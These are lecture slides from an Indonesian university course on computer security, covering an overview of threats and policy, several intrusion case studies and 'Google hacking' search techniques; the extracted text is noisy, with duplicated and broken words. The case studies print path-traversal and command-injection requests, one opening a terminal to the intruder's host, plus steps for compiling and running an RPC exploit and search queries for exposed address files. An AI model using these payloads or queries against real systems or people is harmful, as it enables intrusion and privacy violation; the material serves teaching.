KSK Class1 - Overview and Google Hacking

Keamanan Sistem KomputerKeamanan Sistem KomputerComputer Security

RUDI LUMANTO

UNIVERSITAS BUDILUHURUNIVERSITAS BUDILUHUR

RUDI LUMANTOUNIVERSITAS BUDILUHURSemester Genap 2008/2009

Referensi dan Kontak InfoMatt Bishop, “Computer Security : Art and Science”, Addison-Wesley 2003, 1084 pages.Deborah Russel, G.T Gangemi Sr, “COMPUTER SECURITY BASIC”, ,O’Reilly & AssociatesJohn E Caravan, “FUNDAMENTALS OF NETWORK SECURITY” Artech HouseNETWORK SECURITY , Artech Houseinternet

KONTAK : RUDI [email protected]

0815-1036-9754

RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009

0815 1036 9754Universitas BudiluhurSABTU 13:15- 15:45

KRITERIA PENILAIANKRITERIA PENILAIAN

TUGAS (2-4 report) : 10%UJIAN TENGAH SEMESTER : 40%UJIAN TENGAH SEMESTER : 40%ABSENSI KEHADIRAN : 10 %UJIAN AKHIR SEMESTER 40%UJIAN AKHIR SEMESTER : 40%


DAFTAR SILABUSDAFTAR SILABUS

Overview / Pengenalan Keamanan Sistem KomputerKeamanan Operating Sistem/SoftwareKeamanan Fisik/HardwareKeamanan Jaringan/InternetAncaman Software : virus, worm dll,Ancaman Internet : Serangan TCP, DNS, Dos dll


DAFTAR SILABUSDAFTAR SILABUS

FirewallIntrusion Detection System (IDS)y ( )Mengenal CryptographyAplikasi Cr ptographAplikasi CryptographySkema KerberosVPNAnalisa kebocoran


KEAMANAN SISTEM KOMPUTERKOMPUTER

OVERVIEW

Keamanan Software

KeamananHardware

Keamanan Jaringan

Ancaman Sofware : Ancaman Internet : TCP Virus, Worm dll Attack, DOS, DNS dll

Firewall

Basic CryptographyBasic Cryptography

Aplikasi Cryptography

Skema Kerberos

VPN


Analisa Kebocoran

KEAMANAN SISTEM KOMPUTERKEAMANAN SISTEM KOMPUTER

1. OVERVIEW


outlineoutline

Why Computer Security ?Computer Security Goals.p yThreats, Vulnerabilities, AttacksPolic and meas rePolicy and measureSimple cases and toolsMaking a good security policy


Why Computer SecurityWhy Computer Security

T t t /i di id l tTo protect company/individual assets– Hardware, software and INFORMATION (data, ability

and Reputation)and Reputation)

To gain a competitive advantage– How many people will use a bank’s internet banking y p p g

system if they knew that the system had been hacked in the past ?

l i h l iTo comply with regulatory requirements To keep your job


Computer Security GoalsComputer Security GoalsC onfidentialityC onfidentialityI ntegrity

A il bilitA vailability

Confidentiality : Prevention of unauthorized access to data, and accidental dataConfidentiality : Prevention of unauthorized access to data, and accidental data disclosures

Integrity : Prevention of improper modifications of the data, either intentionally or accidentally. 1) Modification of the data by unauthorized parties. 2) O ti d t b th i d l i th t i i tibl2) Operation on data by authorized personnel in ways that is incompatible with the nature (syntax) of the data, leading to its corruption.3) Any modification to append-only records, to alter their evidence value.

Availability : Measures to protect data should not result in making it cumbersome


y p gto access and modify the data in ways in which it was intended.

Threats,vulnerabilities and Attacks

Anything that can disrupt the operationTHREATS

Anything that can disrupt the operation, functioning, integrity or availability of computer systemcomputer system.

Stand alone threats– Threat arise without any connection to other system, Ex:

virus password crackervirus, password cracker

Connection threats– Threat arise because of connection to other system


◆Threats Arising from Connection to the other computers

Information leaks •• A database of customer information, including credit card numbers is leaked from an Internet service provider

Falsification

numbers, is leaked from an Internet service provider.

•• The contents of the web site of a public institution are rewritten with the political messages of a dissident group.

Denial of services

rewritten with the political messages of a dissident group.

•• A bookshop site is attacked and its server goes down, discontinuing service.

Impersonation

d sco t u g se ce

•• An intruder fakes a membership site for the purchase of merchandise.

Attack platform •• A corporate network administering a server used as a platform for attacking other sites was sued for compensation for the


damage caused.

VulnerabilitiesWeakness in the design, configuration or

implementation of a computer system thatimplementation of a computer system that renders it susceptible to a threat.

1. POOR DESIGN Hardware and software system that contain design flaws that can beexploited Ex: sendmail flaws in early version of unix that allowedexploited. Ex: sendmail flaws in early version of unix that allowed hackers to gain privileged root access

2. POOR IMPLEMENTATIONSystem that incorrectly configured because of in-experience insufficientSystem that incorrectly configured because of in-experience, insufficienttraining or sloppy work. Ex: a system that does not have restricted access Privileged on critical executable file.

3. POOR MANAGEMENT


Inadequate procedures and insufficient checks and balances. Ex: No documentation and monitoring

Critical Vulnerabilities and Vulnerability Scanning

Certain security vulnerabilities are declared critical when they are (or are about to) being actively exploited and represent a clear and present dangerUpon notification of a critical vulnerability, systems must be patched by a given date or y p y gthey will be blocked from network access


◆Types of Vulnerability

OS/Program name Cause InfluenceIndex Server ( WindowsNT)Index Service (Windows2000)

ISAPI extension idq.dll overflow

Local system permission seized by an outsider

telnetd (FreeeBSD 4.3 and Buffer overflow during AYT Telnetd permission (normally (earlier, Red Hat 7.1 and earlier, etc.)

goptional packet processing

p ( yroot) seized by an outsider

sadmind (Solaris2.3 – 7) Buffer overflow during NETMGT_PROC_SERVICE

Command executable with root permission by an outsider

request processingSSH 1.2.31 OpenSSH 2.2 and earlier

Overflow in an int variable in detect_attack function

Command executable with root permission by an outsider

dtspcd (AIX 4.3/5.1, HP-UX Buffer overflow in a shared Arbitrary command p (11.11, Solaris 8, etc.) library

yexecutable with root permission by an outsider

Bind8.2x(Red Hat, Turbolinux, Solaris, AIX , etc.)

Buffer overflow during TSIG processing

Operation permission (normally root) seized by an outsider

wu-ftpd 2.6.0 and earlier (Red Hat linux 6.2 and earlier, etc.)

Format string bug in site-exec and setproctitle functions

Execution permission (normally root) seized by an outsider


IIS4.0 (WIndowsNT)IIS5.0 (Windows2000)

Access to a file outside root directory permitted when path name is UNICODE

Shell command executed with IUSR_Machinename permission by an outsider

ATTACKSA specific technique used to exploit a vulnerabilty.Ex: a threat could be a denial of service, a vulnerability, y

is in the design of OS, and an attack could be a “ping of death”

Passive attacksPassive attacks– Gathering information by monitoring and recording

traffic on the network, or by social engineering. Ex: packet sniffing traffic analysispacket sniffing, traffic analysis

Active attacks– Overt actions on the computer system


Overt actions on the computer system.

◆Denial of ServiceService downedTarget host Service downed due to overloadTarget host

• Large volume data

Attack platform

• Large volume data

• Packets causinga system down

Start attack!!


Policy and MeasurePolicy and MeasureSecurity Trinity : foundation for all security policies and measures that an organization develops and deployg p p y

What is Security ?Definitions from the Amer.Herit.Dic : - Freedom from risk or danger:safety

Measures adopted To preventSecurity

Prevention

- Measures adopted …. To prevent a crime.

Computer Security Measures-Mechanisms to prevent, detect and recover from threats and attacks orfor auditing purposes.


Key pointComputer Security is not only a technical

problem it is a business and peopleproblem, it is a business and people problem.

Th t h l i th t th diffi ltThe technology is the easy part, the difficult part is developing a security policies/plan th t fit th i ti ’ b ithat fits the organization’s business operation and getting people to comply with th lthe plan.

Social engineering : non-technical methods hackers employ to gain access to


g g p y gsystem, refers to the process of convincing a person to reveal information

Security operations

-Prevention againts accidental capture or modification ofg pinformation

-Detection of all improper access to data and system resources

R-Recovery from unauthorized access, restoring data values, system integrity etc

Policies and ProceduresU i il d-User privileged-Data backup

-Security tools to deploy-Monitoring the integrity


Monitoring the integrity-Response to Incident

-User role, etc

◆Types of Users

Hacker A user who tries to obtain access using advanced knowledge g gand techniques.

Cracker A user who attempts sabotage and other subversive activities with malicious motives

Script kiddy A user who has little technical capability and uses tools available on the Internet when attempting cyber attacks

Corporate network

Intrusion, subversion, sabotage

Subversion, sabotageVulnerability


◆Integrity Check Tool

/etc/passwd file

dc577ef5f97b671781c04425737bc4df

#hash value (MD5)

File editing/falsification Mismatch ... Altered!!

b0ed782bbd4c8445f07538a3ede788eb


◆Security Tools and Security Products

Server/clientC t t kMalicious user

Malicious user

Server/clientCorporate network

Internet

• Router(Filtering)• Firewall(VPN)

• H-IDS• Log monitoring

Countermeasures against hacking

Network security Server security

Firewall(VPN)• N-IDS• Vulnerability audit

• Log monitoring• Falsification prevention• Vulnerability audit

against hacking


• Virus scan• Encryption

• Virus scan• Encryption(SSH)

Miscellaneous

◆Firewall?

I t tInternet Intranet

Public WWW server

① HTTP

Client Public FTP server

② HTTP

③ FTP

④ HTTP

⑤Unspecific AP

ClientServer

Authentication

P k t filt i

GW type firewall

• Packet filtering

• Application gateway


• Stateful inspection

◆Encryption VPN(Virtual Private Network)=Leased Linethe Internet e.g. IPsec IPv6

FW/VPN

Remote access user

g

FW/VPN router

Provider A Provider C

Encrypted Encrypted communicationcommunication

Internet IX

Provider A Provider C

Provider BProvider D

FW/VPN router


Response to Computer Security Incidents

Mandatory incident reporting;– Report all suspicious activity: ex :

• If urgent to Computer Helpdesk• Or to system manager (if immediately available);

i @f l• Non-urgent to [email protected];

– Incidents investigated by Computer Incident Response Team (CIRT);Response Team (CIRT);

– Not to be discussed!


CIRT (Computer Security Incident Response Team)

Security experts drawn from throughout the labInvestigate (“triage”) initial reports;Coordinate investigation overall;Work with local system managers;Call in technical experts;May take control of affected systems;y y ;Maintain confidentiality;


Other Rules for General Systems

Warning system;– First time warning, repeat offense disciplinary action;

Unauthorized or malicious actions;Unauthorized or malicious actions;– Damage of data, unauthorized use of accounts, denial of service,

etc., are forbidden;Ethical behavior;Ethical behavior;– Same standards as for non-computer activities;

Restricted central services;M l b id d b C ti Di i i– May only be provided by Computing Division;

Security & cracker tools;– Possession (& use) must be authorized;


User roleUser role

Guard against malicious code in email– Don’t open attachments unless you are sure p y

they are safe– Don’t trust who email is from– Updated and enabled virus signatures

Guard against malicious code from web Gu d g s c ous code o webbrowsing


User role - 2User role - 2

Obey Strong Authentication Policy (Kerberos)– Don’t run network services (login or read write ftp) unless they

demand Kerberos authentication– Treat your kerberos password as a sacred object (never expose it

over the network)Promptly report potential computer security incidents– Ex : call by telephone or email to [email protected]

(if in US)– Follow CIRT instructions during incidents (especially about g ( p y

keeping infected machines off the network and preserving the status of an infected machine for expert investigation)


Example of Policy IssuesExample of Policy Issues

Data backupIncidental usePrivacyOffensi e materialOffensive materialLicensing


Data Backup Policy - UsersData Backup Policy - Users

– Users (data owners) responsible for determining:

• What data requires protection;• How destroyed data would be recovered, if needed;• Coordinating backup plan w/ sysadmins;• Coordinating backup plan w/ sysadmins;

– or doing their own backups;

• If the backup is done for you it might be worth p y goccasionally checking that you can really retrieve the data


Privacy of Email and FilesPrivacy of Email and Files

May not use information in another person’s files seen incidental to any activity (legitimate or not) for any purpose w/o either explicit permission of the owner or a “reasonable belief the file was meant to be accessed by others.”– Whether or not group/world accessible;– “Group” files implicitly may be used by the


p p y y ygroup for the mission of the group;

A simple case and tool( seing the( seing the technique/informasition behind a case)


A Security Case

A company called “Acme-art. Inc” doing an online business in the internet. They have a database that record all customers information included their credit cardi f i d d h i i h d b fi llinformation and connected to their site www.acme-art.com that protected by firewall.31 October 2001 a hacker intrude to their system and stole all credit card information, Then put the information into newsgroup usenet. A few hour then the company has loss million dollars bad reputation and have to invest many more money to keep theirloss million dollars , bad reputation and have to invest many more money to keep their business alive.

What happen ? How it could be happen ?

The firewall is installed. And the internet access can Fact :


only be done through http port 80.

Security team investigation: Sample case 1

Looking for clues in log file…

10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 345210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 846810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 691210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

10 0 1 21 - - [31/Oct/2001:03:03:13 +0530] "GET /index cgi?page=falls shtml HTTP/1 0" 200 680

A

10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] GET /index.cgi?page=falls.shtml HTTP/1.0 200 68010.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 5264010.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 65210.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

B

C10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

C

D

10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1 0" 200 1228

E


HTTP/1.0" 200 122810.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

F


Part A in log file

10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 345210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 846810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 691210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

Browsing …….g



Part B in log file

10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 68010.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 5264010.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 65210 0 1 21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel jpg HTTP/1 0" 200 36580

g

10.0.1.21 [31/Oct/2001:03:03:18 +0530] GET /tahoel.jpg HTTP/1.0 200 36580

Browsing …….



l f lPart C in log file

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272[ / / ] / g / /

T i di tTrying direct access ….

Error response



Part D in log fileg10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

Attacking …

SecurityHole

1


Security team investigation: Sample case 1Perl script


Security hole 1: validation form for parameter variable will be transfer to index.cgi script


Part E in log filePart E in log file10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

Attacking …

SecurityHole

1


Recovering passwd file


Passwd filePasswd file

root:x:0:0:root:/root:/bin/bash………………Lion:x:500:500::/home/lion:/bin/bash


Security hole 1 effect: recovering important “passwd” files


Part F in log file10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 122810.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

Attacking …

SecurityHole

2


Direct execution to server commands


10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0[ / / ] / g p g | p y+%26| HTTP/1.0" 200 1228


Information/technique behind the case

Information about targetHTTP Structure CGI/PERL LINUX s tem and its commandLINUX sytem and its command


Httpd file default structures what is the web site structure ?

Lisv01

/(root)

h bi bi dhome var sbin bin dev etc usr …

u01 u02 u03 … www httpd init.dlog

public_html html conf (default user’s directory) (default document root) httpd

httpd

httpd.conf


*Document root : The directory that holds HTML documents.* : file

11

WWW server

Client-side application

Behind the Web

WWW server

WWW browser

Internet/Intranet

WWW server software

HTML&Intranet server_software Script

Execute application

N t k l di li ti

JAVA SCRIPT

WWW server software A li ti

WWW serverNetwork-loading application

WWW browser

Internet/I t t

ＷＷＷﾌﾞﾗｳｻﾞ

server_softwareApplication

Application

S id li ti

Intranet

Execute applicationJAVA Applet,Active X

WWW server

WWW Server

Server-side application

WWW browser

Internet/

Active X

CG


ApplicationServer_software

Internet/Intranet

Execute application

CGI,Active Server Pages

S 2Sampe case 2


Sample case 2

After a period of new reqruitment,a server in a company suddenly crash down. Company network become unavailable for a while and it led to the much loss in production.a while and it led to the much loss in production.

What happen ?What happen ? How it could be happen ?

No Log files indication !!!


Security team investigation: Looking for clues by social engineering

O l i ll h i d 2000 i hi d

Sample case 2

One new employee install the windows 2000 server in his computer and connect tothe LAN with global IP address.

Other Clues : 1. Nessus report on vulnerabilies in windows 20002. exploit program available

Analysis of Host

Nessus report on

Address of Host Port/Service Issue regarding port

192.168.27.31 ftp (21/tcp) Security hole found

192.168.27.31 smtp(25/tcp) Security hole foundpWindows 2000 serverafter IIS installation

192.168.27.31 http (21/tcp) Security hole found

192.168.27.31 nntp (119/tcp) Security hole found

192.168.27.31 msrpc(135/tcp) Security hole found

192.168.27.31 Netbios-ssn (139/tcp) Security not found

192.168.27.31 https (443/tcp) Security not found

192.168.27.31 Microsoft-ds (445/tcp) Security hole found


…… …. ….

…… …. ….

NESSUS report in detail

Sample case 2

Other references: IAVA:2003-A-0012

NESSUS report in detail

NESSUS ID:11835

Vulnerability msprc(135/tcp) The remote host is running a version of windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code y yand gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability. Namely, the MsBlaster worm.

Solution : see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspxRisk factor: highCVE:CAN-2003-0352BID:8205Other referemces: IAVA:2003-A-0011NESSUS ID: 11806

Warning msprc(135/tcp) Distributed Computing Environment (DCE) services running on the remote host


remote host

NESSUS ID : Identity Number of Vulnerability Check by NESSUSBID : Buqtraq ID : related documentation regarding the vulnerability including

Sample case 2

BID : Buqtraq ID : related documentation regarding the vulnerability including exploit code , see: security focus site

simulation

1. Downloading the exploit code source file (from security focus site or Whoppix CD）$cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c

simulation

p p p y2. Compiling source file

$gcc oc192-dom.c3. executing the exploit into the IP target machine

$a out d 192 168 94 204$a.out -d 192.168.94.204

Get the system access

C:>WINNT\SYSTEM32\


Information/technique behind the case

-Insufficient security orientation for new employee-Lack of knowledge about OSTh i l l it d i th i t t-There is always exploit code in the internet

-Lack of information about update


Sampe case 3Sampe case 3

what kind of security techniques behind ?techniques behind ?


The warrior of the NET


Making a good securityg g ypolicy


Making a good security policyMaking a good security policy

Penetration Test/Ethical Hacking– Understanding what is inside the hackers g

mindSecurity Trinityy ySecurity Goals


Definition of "Ethical Hacking“

A thi l h ki i h t d t k t hAn ethical hacking is where a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system ethical hacking uses the same methods as their lesssystem, ethical hacking uses the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing intrusion testing and red teaming Individuals involved intesting, intrusion testing, and red teaming. Individuals involved in ethical hacking is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat. g yOne of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming i i l t id th t d t h l


increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.

Inside the Hackers MindS f ll k d S

Focus on the target- Successfully attack and Save -

Never use your own informationNever leave your footstepy pCan ever back again

HACKERS PROCEDURE


Hackers Procedure/stepHackers Procedure/stepTargetingScanningRemote Attack 1. Information gathering

Local AttackLog removing / deception

2. Attack, intrusion

3. Unauthorized actLog removing / deceptionSpace usingTime stamp

4. Actions taken after unauthorized act

Time stamp Back door


Example of Targeting

All Informations about the target

Technique name : Web browser targetingGoals : personal information about the targetOperation base any web browser with search engine siteOperation base - any web browser with search engine site

(google)- online database (WHOIS, IP-CONVERSION,etc)

Location, related company/organization, news, telephone number,Contact (mail address), web author idea/though,/behaviour, site software


Targeting with google

By using the basic search techniques combined y g qwith Google's advanced operators, anyone can perform information-gathering and p g gvulnerability-searching using Google. This technique is commonly referred to as Google q y ghacking.


Google hacking

Mastering google using its standard optionsg g g g p– Double quotation ….to be recognized a keyword as a phrase

– Hyphen (-) …. If you want to exclude words contain keyword

i– site: …. searching only inside the site– * …. wildcard. Use with double quotation to find any

indicate word

– Intitle: …. search limited only to web title– Inurl: …. search limited only to web page URL

I t t h li it d l t i f th– Intext: …. search limited only to main page of the web

– Filetype: …. search focusing on extention type of


file– Phonebook: …. search telephone number

Google hackingMastering google using its optionsMastering google using its options– site: …. searching only inside the site

“hacker” site:www.cnn.com or site:www.cnn.com hacker

This query searches for the word hacker, restricting the search to therestricting the search to the http://www.cnn.comweb site. How many pages on the CNN web server contain the word hacker


Google hackingMastering google using its options– * …. wildcard. Use with double quotation to find any indicate word

“He is a * Hacker”


Google hackingMastering google using its standard optionsaste g goog e us g ts sta da d opt o s– intitle: …. search limited only to web title

intitle: “Hacker”


Google hackingMastering google using its standard optionsMastering google using its standard options– Inurl: …. search limited only to web page URL

inurl: www.securityfocus.com


Google hackingMastering google using its standard optionsg g g g p– intext: …. search limited only to main page of the web

intext: “earthquake”


Google hackingMastering google using its standard optionsg g g g p– Filetype: …. search focusing on extention type of file

“hacking” filetype:ppt" h i " fil i"whoppix" filetype:iso


Google hackingMastering google using its standard optionsg g g g p– Phonebook: …. search telephone number

phonebook: John Doe CA


Searching the site inside (that actually) not explore to publicSearching the site inside (that actually) not explore to public

More on Google hacking

Searching the site inside (that actually) not explore to publicSearching the site inside (that actually) not explore to public

Finding on server directory listingDirectory listings provide a list of files and directories in a browser window instead of the typical text-and graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering

Most directory listings begin with the phrase Index of which also shows in the title AnIndex of, which also shows in the title. An obvious query to find this type of page might be

intitle:index.ofwhich may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:


Index of Native American Resources on the InternetLibDex—Worldwide index of library cataloguesIowa State Entomology Index of Internet Resources


C bi i l i i

Several alternate queries that provide more accurate results:

Combination google options on queries

q pintitle:index.of "parent directory" intitle:index.of name size These queries indeed provide directory listings by not only focusing on index of in the title but on keywords often foundfocusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches

fi d fil f di i l d i di li ito find files of directories located in directory listings.

Example:pName Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“

Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs


bbs.dat inurl:"Index of" intitle:“Index of“

Example:Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"



Example:Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs



Example:bbs.dat inurl:"Index of" intitle:“Index of“



Example: searching database of address people written in csv focusing to japan sitefiletype:csv address site:jp


yp jp


Example: searching database of address people written in EXCEL focusing to UK sitefiletype:xls address site:uk


yp



Documents

KSK Class1 - Overview and Google Hacking